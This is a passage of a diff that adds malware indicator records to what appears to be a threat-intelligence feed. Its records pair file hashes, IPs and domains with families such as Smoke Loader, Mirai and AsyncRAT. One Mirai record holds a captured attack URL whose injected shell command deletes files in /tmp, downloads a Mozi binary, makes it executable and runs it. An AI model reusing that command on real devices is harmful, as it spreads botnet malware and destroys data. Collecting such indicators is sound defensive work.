}, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "b36895bd1bd2ce3cb3bed57271a84b4a5474a537", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628162143, + "hash": [ + "f84c96dcaef64aed2b220e839d14257e", + "69d07083824b1d957ab86ba8bae9f1c6287f7904", + "7080a9d723740995f65248f33f3762e6e843bb3cbce2f84b82d41b4b699a5e03" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6df2d168d4c300c9e53b5910a592582c3ede0d0c", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628162375, + "hash": [ + "d143132dd5c226138d2ff8013afeeb00", + "b6e6203ca55e7685bc05f05b779a79ded02cb258", + "b3b5c8dae4a41a48f0e2ec0f317641f5e61b27c2a93bce73bb4b691f8f402de8" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "78eea48700bdb03019d6c081c90ea8e6f85dedab", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628162698, + "hash": [ + "2abcdd6b35afb3f4b3c6fea9f52f118b", + "1014c8f5afa89e7fbdbbf8ff47d58a717a697e6c", + "a00090957f56c39f38fe935d48109b7ed6e3bb1d37b855dc9ca1d72e49ae8fc4" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "0375a1945a2a07810307dba9a77aca073b4250a6", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628163066, + "hash": [ + "53ae051a6d88869ee4654dc3cb9f43f2", + "9b7dba46c7ad73718eb16ebf86dd47a5cf3a12ac", + "73a9828b5bad3b91f0dfff2a351805a1722c6a8b5c0efde8e94ad366780e2156" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "95a7f80850239061346983bcaeda6cd4456218e1", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628163316, + "hash": [ + "a544dca1bbfe91f6e69a6606b257c175", + "7e17afa009afdcc8bed0419cd615ded2d6c6d08c", + "c73640b743d7dd1daf9090d09ee26cca3966d4d740101ff9057480e171c20e42" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "4987c808e504cea91a0606e53699b0193affb647", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628225600, + "hash": [ + "b168d571001677a483ec46e47b956d93", + "23e4fe803603681649eb3c7cb00dcad175f7870a", + "2e41784cbf53f1e4839f98245e21526360e33454571bd3cdf660c91848adb352" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "464a8f2a1dd34c6438881f22a5a52df702da6d27", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628225854, + "hash": [ + "9684abbb37955cf020d9e9126133f8d2", + "d0ec47f849530a033393d1ec4f7d2e6d44231d4b", + "72a4d789821a9153f6181debeec84c870d8f47d52a711c76bdaf6c7d8d32855a" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "fdd3f288032a98d6b0a84d0caa171057a63c6653", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628226065, + "hash": [ + "b696dc49bfe346e5ec2565f3e5f5002d", + "51dd3b196546c0a72560d0ca40233c8aeeb4db00", + "32272a7ed59fce4077e6689528221da7c233af2f0f6bc868b30e5126479d8b8e" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "a18ead165ce298ed492c73404fb9585105cf2687", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628226299, + "hash": [ + "905c25f5d4c13fbe29b80825e9861d93", + "526859dfef661aa5c572ff38ab8a8f6e24e9edee", + "d70827a88a8fc48eb81441de2216573a0489b54e8aad42219f291bf41e9df87d" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "a01af6a1699e233c87071dbcd78a0b93c09bb1da", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628226549, + "hash": [ + "2578c566156aaa7427e7873bba2162fb", + "541bf645ab79397feb9ce62aaa97fe506ecdb6de", + "88206e5211ecab6631ddb6ea9d9c296caadaa8c616b26afa41299a82b3782bd3" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "a3e1f86f17fd74190f8048128430370a351d59b2", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628226837, + "hash": [ + "8233659dbce70b694f791349a70be5ff", + "67d0f5c080e5a6553d2c9a00a309055168c43926", + "ba74ecae43adc78efaee227a0d7170829b9036e5e7f602cf38f32715efa51826" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "29ca542646c3ca4133f8523d2e667ab925d7392a", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628227153, + "hash": [ + "b5936d56ca8ed943b7fa2bcd35e5843d", + "fcb1fcccb3df1bc1b91855a9b860977bd8adfa61", + "a62ea18ad68d7a850ab2748cc95b9d724911dccaf6da398b8063eb183d8ebfaa" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "0d9051e6d271982eadc3c71153d25aa8eda54f54", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628227381, + "hash": [ + "fede9c5e30830ef01b008a0b1e8d2ec4", + "3bb69feccf746c6804266555650346c6e4e77908", + "8526e48a9b252c12357657c594e8a30bf33985a0577f3809c39514d83a2931e8" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "2e9f362f5db334c272f5922abfd4ed35003cca55", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628227656, + "hash": [ + "51636e7775782f91df225f511b297f96", + "bd338186079c1afd2750416c02b8650dbb6e463a", + "07439f8a2adbe031b3b1f4bca85a8f8e99dfac6499ec6f9261d3c01d7a744bb6" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "34557347d5b8b5043c5b35f1bf5b4f0b77e69c83", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628279289, + "hash": [ + "679c184a4e7beb62862c1c652a80bcac", + "8034bae393fd2a184a7d58422a6326614511da47", + "509836cfab0a99f5c2d8b80c78708a144bccd174041b991230d218979179deaa" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "b1e8d08c7801132f04ade6a0d3f61df84b15b595", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272664441869, + "hash": [ + "9ba4dba71373b2faaaddb5118b394781", + "d1f59b6a5a9fa9b9380def39fff2a6d42e5ebbdc", + "374e343a064ae4a6dd70a24a93c3e4a9d10911a6d35d73ecf5efa143ebf04fa9" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "b8ff5af6e8f590e106377dc19e081b70b38ae738", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272664442112, + "hash": [ + "45a246b02d1779d0fba6cbe2701663cb", + "fb64dd0a3be8649a0a144e0fa484e5cb441d6b4a", + "df1d053dbd17870ca42bb3df121396bb05420f80d1eec860fbb052c8fd06604e" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "bc70941ba52c181e7cafebee47ec5bb54cb7bdeb", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272665870690, + "hash": [ + "caa7ab8fe75eeebcbc0ea55bb39f9a71", + "6e5f44af3aa46bd781a18ea24b9812050dea2080", + "4bf40544a1ffc64b6b26b5f24d8f624b7260cc40b34566b3463cae817bf7b612" + ], + "malwareList": [ + { + "name": "Phorpiex", + "aliases": [ + "Trik", + "Wortrik", + "Phintok" + ] + } + ], + "threatList": null + }, + { + "id": "7ee558042454dae4028d085e1328eefe2dd0e672", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272665870924, + "hash": [ + "a928910f34e95ccb190ce0a25cf47975", + "660906ca31249c7b3c930ebaee1092612d82fddf", + "0ee2dc207f986300dd009138f03d043695c79f31dc5290995d74d17e15eccfc3" + ], + "malwareList": [ + { + "name": "Phorpiex", + "aliases": [ + "Trik", + "Wortrik", + "Phintok" + ] + } + ], + "threatList": null + }, + { + "id": "b8bbad0c651771a6bfcaef5001f25557e6d27ed3", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272666402478, + "hash": [ + "eb36ea4c6296b8336669becf19e6a656", + "ea6b0f83c139bfef78db307fd9788876229d03a8", + "4af51b69e5274bc7f2320a2de22022da92117dccb610906d9216bca4c15275d1" + ], + "malwareList": [ + { + "name": "Astaroth", + "aliases": [ + "Guildma" + ] + } + ], + "threatList": null + }, + { + "id": "9ef7bc8d293466db8e3660dce8e90ac7a5a728de", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272666402700, + "hash": [ + "48b1a9265b7d40a229409c0b97335281", + "ef4448b0105b9c0171e2749442ad9e3b5390cef4", + "2a7b00c2aa20dc8ca31fe473a6edccaf68f70c52353a21ad3b336b8e498a0fd3" + ], + "malwareList": [ + { + "name": "Astaroth", + "aliases": [ + "Guildma" + ] + } + ], + "threatList": null + }, + { + "id": "2b7d6c87bab2eae5c44febf3448ac1d5be31ef4f", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272667519082, + "hash": [ + "bf104d1ef61694d454d031c885cc11f0", + "606a9ededf02e58e3a769fa8edc6b6431458c9f9", + "0b42a93d48e668c426ea979bbeceefefe314709f57947f3184e9c9487440b1b7" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "eebd0af3f884d70c45464c1c865911b1a10216d8", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272667519405, + "hash": [ + "7fdcd2c263cf80e67e77bda4145468fc", + "49c5bf4fc84deb87fd91ee1fc1fc58ae6998b83e", + "b7f99346bbfcabe4c02abcab902dfdd2e6eed7c065eb60620b119db9e28a7954" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "7099c090a26f11945bcb7d8f84f620b2f35a98dc", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272667543252, + "hash": [ + "184e9dcef41e388b52de4012d0920414", + "e15ed4827d8eb3860b69565cc939d5865cb5ffab", + "90c13369dcfae7b8732f94f760e45240ac50a4537f6bf1bb88d30d43bc75ebae" + ], + "malwareList": [ + { + "name": "Nymeria", + "aliases": [ + "Loda", + "Lodarat" + ] + } + ], + "threatList": null + }, + { + "id": "fd830b7e9bc8432ad153b0bb1d11c45aa86d0bd4", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272667543986, + "hash": [ + "b5b10a91b281c513ded4653c24f4f8a0", + "f22638ee8abf9debfe374e39b8380ee0ab29dd81", + "bddf6abc37e6b822d549332852480f0a51dc236cb7986d62770c317a4fac6a13" + ], + "malwareList": [ + { + "name": "Nymeria", + "aliases": [ + "Loda", + "Lodarat" + ] + } + ], + "threatList": null + }, + { + "id": "b204fad85a23e2f9e5aa91145b44e77a726d6dab", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272667544685, + "hash": [ + "4a73e6ceaf20c81a36ea35dc47701d9f", + "bf38e288b7a86b4e59173aaef963022ea7c45170", + "62e5d359a109558b735e7f6eb9b2412322e442974c04f1be60d243a5b0202125" + ], + "malwareList": [ + { + "name": "Nymeria", + "aliases": [ + "Loda", + "Lodarat" + ] + } + ], + "threatList": null + }, + { + "id": "870f4241c7ef2380a67f7919cfbad364b015457c", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272669367296, + "ip": [ + "51.158.97.126" + ], + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6e021471f9de2bac5f8552e30e1a7bbea991b2f7", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "d6e2649e4ff9944d569672efdb56dc83c43e7cfffb74c8ed04333910.appiancloud.com", + "seqUpdate": 17272669367621, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8001a2029a7ab4ddcf81f3dabe525b0c3cf16e15", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "c4005809d8a43ca6b6ba4e5d92b9604178bcdd7cc27fd6bd934f78ff.appiancloud.com", + "seqUpdate": 17272669367726, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "dcc59a7b4048edd460a76ae403491e2430b2683b", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "398f4440616666a270c2c3d46857328b49b5a9ceba5f12654d1d4cae.appiancloud.com", + "seqUpdate": 17272669367822, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "29b5190080cabeb823075e5caafbed888761a5a5", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "1d549a63a960644e8909ee7dadd9f270d0e8f8b3ad3777f8c220c63c.appiancloud.com", + "seqUpdate": 17272669367908, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0b5807e04879bfdf308198c4a10a014b1a2d6da0", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "ecdeee877000d81b694713e1a808c90feef8b48034e58679f4902e32.appiancloud.com", + "seqUpdate": 17272669368000, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "905f66f7b863424b6351078bcc36e1cf420cca9a", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "c7f0f2085481d0a6ce181829b1fcfc9f457dfb01f6ae96354e39da64.appiancloud.com", + "seqUpdate": 17272669368091, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "99e83ff8d9a3243f51bfdd79ce0c10f65ee18a45", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "6589ac0d0e32659605cd436f2c428e987b6271de2b17f4cef976d472.appiancloud.com", + "seqUpdate": 17272669368186, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "11aa0d600c33e3442c247cdc0c1e9382b3e80a82", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "185e412ec0b805615398d0208ae52049636f42d39dbb9db3e1902463.appiancloud.com", + "seqUpdate": 17272669368283, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "675f2007e4e72689f3ce293b901f12335d575c8c", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "1d4292e3011e42c8d057bf1817b3067878a19d8320389590b78f4120.appiancloud.com", + "seqUpdate": 17272669368376, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "72e7e37a27ba04f77291726ddc5684bdc3a77bf3", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "74e6190a20ce756135a8480cf067ac55383662d8b9d534200fcb18ca.appiancloud.com", + "seqUpdate": 17272669368467, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "22694dfdd4098ee94bf9eac1cfb652cae8b545e1", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "46cb4e3ddcb42805b46f4bdec0aa029660b8a1866a00e2d36894136a.appiancloud.com", + "seqUpdate": 17272669368559, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ed3d9bd30b427fe0ccbaef1d0fa84abd80fe63c1", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "8be430c5c3f176d2d54c4d42d6147410f73167a4264bfbeffc118bce.appiancloud.com", + "seqUpdate": 17272669368667, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "1ed7f8ae84562c6867dd0f72708a6cb69b3880f3", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "632477de48c03946988a5a68f63903289a8ad994f0d4ff4bcfdf70da.appiancloud.com", + "seqUpdate": 17272669368777, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "fe326674937c3cba3e0ef9c45db6684bf6af0aef", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "9162943899b14053a9398fae2cec82a83d0214f6e7cde89231e69d93.appiancloud.com", + "seqUpdate": 17272669368875, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "17de688584cc63a617e2dc8f609b83d7a28ac1c0", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "daad2abf4f408241d27a70b471ec97dd39bd696e9f11e6e324d3d7d1.appiancloud.com", + "seqUpdate": 17272669368986, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ef46c52e006821911889d2bfe629303b966d5743", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "29071e211472c9e0e1f85e8a29ab35638d82d1686fb6c896b68d0274.appiancloud.com", + "seqUpdate": 17272669369080, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8b99200ad70ca743657f8b3857c6b5e38c8f667d", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "1b75e4fb39446cc0994886f72da9b4c50eee030c1cd78cd976dd814e.appiancloud.com", + "seqUpdate": 17272669369171, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "c9b8fb4b146b09069faea14c675c7e567d4b14b8", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "a7245fb54b9768b50601f93a65f08888f64aa0b09c9324374e3c31dc.appiancloud.com", + "seqUpdate": 17272669369272, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b10079dfc700f36c31c219716ea797a08d62fe09", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "9f51212c0cb44f99bff4ac386961b32c83d0e9126a6001b267377951.appiancloud.com", + "seqUpdate": 17272669369367, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "233c8dbe3d23ad2de5906f2b53d19616531dc83f", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": "http://194.143.143.120/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272678044631, + "ip": [ + "194.143.143.120" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "cb9dfd68fd0fb8cc25c38f3e028b0416742cdc51", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272678044756, + "ip": [ + "27.43.207.10" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "e03d9207420544e4e3093298c4a3013037034b72", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272692019930, + "hash": [ + "5c81b60f8a39d0c875836d2b012348e3", + "0507c5546326e1687261410ef33344e11b62966a", + "58937dd6ca0bda4bf892dc233b063b8fcaf5896a70637fe459ba1e862835fa66" + ], + "malwareList": [ + { + "name": "Meterpreter", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5a0c2c74fbe954687e2ed69ff2d4692602f980fc", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272692570716, + "hash": [ + "1a29ed2d1ae240ec1d6f50dcc960baa3", + "caf7120a216a3a39bee558a6a660f1ffc214a712", + "2e4015f84a9a6d9c22ef65acc66a3cf55c2cabc2d7a6f32b96297ca7d0f56ea4" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "24562b6f8262142e4ef8c4cea3981e0c5f7e8f55", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272699665487, + "hash": [ + "99d2d851d197c52cf2fd9626e73dce82", + "d1356c69a78e899113ad752b82ac652279654d88", + "74535fa528fd18b9f2dde0f134c550a0ff557e708367dfb5be48b59670aa8c83" + ], + "malwareList": [ + { + "name": "ZLoader", + "aliases": [ + "Terdot", + "Axe Bot" + ] + } + ], + "threatList": null + }, + { + "id": "8eedaa1112c8c255ce5df9eb4ab554b2959db92c", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272725461437, + "ip": [ + "52.84.102.11" + ], + "malwareList": [ + { + "name": "AnyDesk", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "e0ab758533f1d2260526dc1a05c56b7ca632f494", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272727245005, + "hash": [ + "3b1b00a7a4ccfdf257b31d8e1701cf2f", + "8834aecbd48d2fb25ae921e7ca014606bc261717", + "6b7554d7fbfcc6f839225f07281c0ef20647ddfe6c60f63d49b9a6d6cd002eda" + ], + "malwareList": [ + { + "name": "AsyncRAT", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4326f63b71a81aee3b36dcdaa69272a5d86d3bd7", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "windows-server-2012-remote-desktop-service.max.com", + "seqUpdate": 17272735556758, + "malwareList": [ + { + "name": "Inno Stealer", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ce8a41887dbcdea0cac64ce4ce35bc7f02f5bd43", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272769830131, + "hash": [ + "6d9b8ff6442e3c42a7ad0e1238960057", + "fab711b446c2cc55f97c7a5afaa9f9833e01a0ea", + "a641af0462259586cf10b8867653e163f73b6066106455605643b08ab829ac77" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "e7942002133e3086d1828f8b80b47f1cbd80202a", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272797188193, + "hash": [ + "cddb077d424a9972b8bd826318bb90ac", + "19a3db1f52901760a06a4f539933cafe8404a56b", + "bc151a1ea4f9ba8645ca5ec661e38cbd26912f37d1046fd89461dd7ca343daa7" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "8d85fe22e6406173ac62f810a5496436069ab72d", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272840903611, + "hash": [ + "4190a525416d4f3edfcd5cffdfb60f73", + "172834467c51d57023c173d2d8b585ac58658507", + 